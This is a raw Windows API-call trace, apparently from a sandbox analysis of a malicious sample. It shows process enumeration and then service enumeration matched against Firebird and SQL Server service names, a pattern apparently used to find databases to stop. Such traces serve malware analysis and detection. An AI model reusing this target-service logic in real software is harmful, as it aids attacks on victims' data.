lstrlenW (lpString="svchost.exe") returned 11 [0031.722] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.722] lstrlenW (lpString="svchost.exe") returned 11 [0031.722] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.723] lstrlenW (lpString="svchost.exe") returned 11 [0031.723] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.723] lstrlenW (lpString="svchost.exe") returned 11 [0031.723] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0031.724] lstrlenW (lpString="audiodg.exe") returned 11 [0031.724] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.724] lstrlenW (lpString="svchost.exe") returned 11 [0031.724] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.725] lstrlenW (lpString="svchost.exe") returned 11 [0031.725] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.726] lstrlenW (lpString="dwm.exe") returned 7 [0031.726] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.726] lstrlenW (lpString="explorer.exe") returned 12 [0031.726] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.727] lstrlenW (lpString="spoolsv.exe") returned 11 [0031.727] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.727] lstrlenW (lpString="taskhost.exe") returned 12 [0031.727] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.728] lstrlenW (lpString="svchost.exe") returned 11 [0031.728] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0031.728] lstrlenW (lpString="taskeng.exe") returned 11 [0031.728] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.729] lstrlenW (lpString="taskhost.exe") returned 12 [0031.729] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0031.730] lstrlenW (lpString="called.exe") returned 10 [0031.730] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0031.730] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0031.730] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0031.731] lstrlenW (lpString="analyst.exe") returned 11 [0031.731] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0031.731] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0031.731] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0031.732] lstrlenW (lpString="wages.exe") returned 9 [0031.732] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0031.733] lstrlenW (lpString="rand.exe") returned 8 [0031.733] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0031.733] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0031.733] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0031.734] lstrlenW (lpString="cottage.exe") returned 11 [0031.734] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0031.734] lstrlenW (lpString="pairs_spec.exe") returned 14 [0031.734] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0031.735] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0031.735] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0031.735] lstrlenW (lpString="observationshairy.exe") returned 21 [0031.735] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0031.736] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0031.736] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0031.804] lstrlenW (lpString="spectrum.exe") returned 12 [0031.804] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0031.805] lstrlenW (lpString="dies.exe") returned 8 [0031.805] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0031.805] lstrlenW (lpString="configured.exe") returned 14 [0031.806] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0031.806] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0031.806] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0031.807] lstrlenW (lpString="fast.exe") returned 8 [0031.807] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0031.807] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0031.807] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0031.808] lstrlenW (lpString="review.exe") returned 10 [0031.808] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0031.808] lstrlenW (lpString="historybinding.exe") returned 18 [0031.808] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0031.809] lstrlenW (lpString="pk task surge.exe") returned 17 [0031.809] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0031.810] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0031.810] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0031.810] lstrlenW (lpString="mobsync.exe") returned 11 [0031.810] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.811] lstrlenW (lpString="dllhost.exe") returned 11 [0031.811] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.812] lstrlenW (lpString="dllhost.exe") returned 11 [0031.812] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0031.812] lstrlenW (lpString="ivttvf.exe") returned 10 [0031.812] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0031.813] lstrlenW (lpString="cmd.exe") returned 7 [0031.813] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0031.813] CloseHandle (hObject=0x118) returned 1 [0031.814] Sleep (dwMilliseconds=0x1f4) [0033.100] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efaa8 [0033.101] EnumServicesStatusExW (in: hSCManager=0x5efaa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0033.101] GetLastError () returned 0xea [0033.101] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x3ef27d0 [0033.101] EnumServicesStatusExW (in: hSCManager=0x5efaa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3ef27d0, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3ef27d0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0033.102] CloseServiceHandle (hSCObject=0x5efaa8) returned 1 [0033.102] lstrlenW (lpString="Appinfo") returned 7 [0033.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0033.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0033.102] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0033.102] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0033.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0033.102] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0033.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.102] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0033.102] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0033.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0033.102] lstrlenW (lpString="AudioSrv") returned 8 [0033.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0033.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0033.102] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0033.102] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0033.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0033.102] lstrlenW (lpString="BFE") returned 3 [0033.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0033.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0033.102] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0033.102] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0033.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0033.102] lstrlenW (lpString="CryptSvc") returned 8 [0033.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0033.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0033.103] lstrlenW (lpString="CscService") returned 10 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0033.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0033.103] lstrlenW (lpString="DcomLaunch") returned 10 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0033.103] lstrlenW (lpString="Dhcp") returned 4 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0033.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0033.103] lstrlenW (lpString="Dnscache") returned 8 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0033.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0033.103] lstrlenW (lpString="DPS") returned 3 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0033.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0033.103] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0033.103] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0033.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0033.103] lstrlenW (lpString="eventlog") returned 8 [0033.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0033.104] lstrlenW (lpString="EventSystem") returned 11 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0033.104] lstrlenW (lpString="gpsvc") returned 5 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0033.104] lstrlenW (lpString="iphlpsvc") returned 8 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0033.104] lstrlenW (lpString="LanmanServer") returned 12 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0033.104] lstrlenW (lpString="LanmanWorkstation") returned 17 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.104] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0033.104] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0033.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0033.104] lstrlenW (lpString="lmhosts") returned 7 [0033.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0033.105] lstrlenW (lpString="MMCSS") returned 5 [0033.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0033.105] lstrlenW (lpString="MpsSvc") returned 6 [0033.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0033.105] lstrlenW (lpString="Netman") returned 6 [0033.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0033.105] lstrlenW (lpString="netprofm") returned 8 [0033.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0033.105] lstrlenW (lpString="NlaSvc") returned 6 [0033.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0033.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0033.105] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 